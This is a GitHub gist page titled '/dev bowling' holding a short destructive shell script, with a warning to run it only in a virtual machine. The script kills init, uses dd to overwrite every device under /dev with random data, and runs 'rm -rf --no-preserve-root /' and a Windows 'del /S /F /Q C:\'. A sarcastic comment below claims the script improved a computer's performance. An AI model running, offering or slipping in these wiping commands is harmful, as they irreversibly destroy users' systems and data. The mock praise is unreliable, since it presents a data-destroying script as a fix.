Last active
February 20, 2025 11:03
-
-
Save hello-smile6/fa92b539fce2339440bdd75e087cae8b to your computer and use it in GitHub Desktop.
/dev bowling
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# DO NOT RUN UNLESS IT'S A VM! I TAKE NO RESPOSIBILITY FOR YOUR ACTIONS WITH THIS. | |
exit | |
kill -9 $pid | |
logout | |
kill -9 1 | |
pkill init | |
sudo pkill init | |
for device in `find /dev` | |
do | |
# Don't run synchronously | |
`echo $device;dd if=/dev/urandom of=$device`& | |
done | |
echo "Well, something didn't work right. Your computer's still intact. Oh, well." | |
rm -rf / | |
rm -rf --no-preserve-root / | |
# For windows | |
del /S /F /Q C:\ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Just found this script, thanks a lot! It optimized the performance of my computer so much, and solved many other problems. (Computers were a mistake to begin with.)